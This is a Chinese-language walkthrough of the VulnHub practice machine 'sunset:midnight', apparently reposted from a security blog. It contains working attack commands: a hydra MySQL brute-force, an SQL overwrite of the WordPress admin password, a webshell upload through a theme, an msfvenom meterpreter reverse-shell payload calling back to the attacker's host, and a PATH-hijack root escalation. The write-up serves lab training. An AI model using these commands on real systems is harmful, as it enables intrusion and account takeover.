vulnhub靶机-sunset:midnight

admin 2022年6月27日00:42:47安全文章评论3 views1960字阅读6分32秒阅读模式

目标主机:192.168.12.211

操作机(kali):192.168.70.128

首先对目标主机进行端口探测,发现存在22、80、3306等端口信息。

vulnhub靶机-sunset:midnight

然后直接访问80端口http://192.168.12.211/,跳转到http://sunset-midnight/域名地址,所以直接对host文件进行了配置后使用域名直接进行访问。

vulnhub靶机-sunset:midnight

发现看见web服务的网站页面以后,发现其实就是一个WordPress的站点。

vulnhub靶机-sunset:midnight

然后我们尝试使用wpscan对当前站点进行扫描:wpscan --url http://sunset-midnight/,在扫描中发现了一些网站网站路径等相关信息

vulnhub靶机-sunset:midnight

查看一下当前服务的一些指纹信息,根据WordPress的版本信息搜索了一下当前版本存在的一些漏洞信息,然而发现检索的漏洞在当前版本中并不可用。

vulnhub靶机-sunset:midnight

我们并同步对WordPress的用户进行枚举扫描:wpscan --url http://sunset-midnight --enumerate u,我们获取到admin用户是存在的

vulnhub靶机-sunset:midnight

然后我们再对获取到的admin用户尝试进行密码爆破攻击:wpscan --url http://sunset-midnight/ -P password.txt -U admin

vulnhub靶机-sunset:midnight

然而我们并没用成功爆破出密码

vulnhub靶机-sunset:midnight

后来直接尝试对数据库进行爆破攻击:hydra 192.168.12.211 mysql -l root -P password.txt

vulnhub靶机-sunset:midnight

成功爆破出了mysql数据库的用户密码:[3306][mysql] host: 192.168.12.211 login: root password: robert

接下来直接使用了kali远程连接数据库进行操作:mysql -u root -p -h sunset-midnight

vulnhub靶机-sunset:midnight

成功连接了数据库后我们直接操作数据库修改当前WordPress中admin用户的密码信息:

show databases; #查看数据库信息

use wordpress; #定位切换数据库

select userpass from wpusers; #查询当前网站用户密码信息

我们看见数据库用户表中其实只有一条用户数据信息,所以我们直接这条数据的密码进行修改

vulnhub靶机-sunset:midnight

我们将覆盖的密码数据是我们自己想要设置的一个密码进行MD5加密:

update wpusers SET userpass="76a2173be6393254e72ffa4d6df1030a" where id=1; #使用passwd进行MD5加密后去修改之前的密码信息

vulnhub靶机-sunset:midnight

可以看到我们的密码直接修改成功,然后我们就使用我们修改后的密码直接登陆WordPress后台进行getshell操作。

vulnhub靶机-sunset:midnight

通过上传主题文件来getshell 首先先去官网下载一个主题压缩包,之后将执行代码和系统命令的源码写入shell.php中,然后将其放入压缩包一起上传

vulnhub靶机-sunset:midnight

之后访问/wp-content/themes/[主题名]/[shell文件名]即可得到一个shell,成功获取了系统权限

vulnhub靶机-sunset:midnight

然后我们尝试进行shell反弹,使用nc监听非常不稳定,根本无法进行shell连接,尝试使用msf生成getshell的木马文件进行反弹shell:

vulnhub靶机-sunset:midnight

所以下面使用msfvenom生成shell.php,msf进行监听获得shell

访问appearance->add new ->upload theme进行上传

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.12.128 LPORT=7777 R > getshell.php

vulnhub靶机-sunset:midnight

访问请求shell文件,代码执行后shell获取成功

vulnhub靶机-sunset:midnight

直接进入shell功能,对主机进行信息收集

vulnhub靶机-sunset:midnight

我们通过翻阅了网站的数据库连接文件获取了数据库连接的账号jose和密码

vulnhub靶机-sunset:midnight

然后我们又在系统用户信息中发现存在一个用户与网站数据库连接用户jose相对应

vulnhub靶机-sunset:midnight

然后我们尝试使用数据库连接用户的密码切换到jose用户,直接成功切入。使用 sudo-l查看当前权限,发现jose不能使用sudo。

vulnhub靶机-sunset:midnight

查看SUDI权限的文件:find / -perm -u=s -type f 2>/dev/null

vulnhub靶机-sunset:midnight

由于不能使用sudo命令,所以大多数命令都不能进行提权,但是发现存在一个status命令,并不太常见,执行一下

vulnhub靶机-sunset:midnight

从上面可以看到status使用了service命令,但是为未使用service的绝对路径,所以可以尝试更改$PATH来执行该文件

  1. cd /tmp


  2. echo "/bin/bash" > service


  3. chmod 777 service


  4. echo $PATH


  5. export PATH=/tmp:$PATH #将/tmp添加到环境变量中


  6. status

再次执行之后便成功获得了root权限

vulnhub靶机-sunset:midnight


原文始发于微信公众号(陆吾安全攻防实验室):vulnhub靶机-sunset:midnight

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月27日00:42:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  vulnhub靶机-sunset:midnight http://cn-sec.com/archives/1067499.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: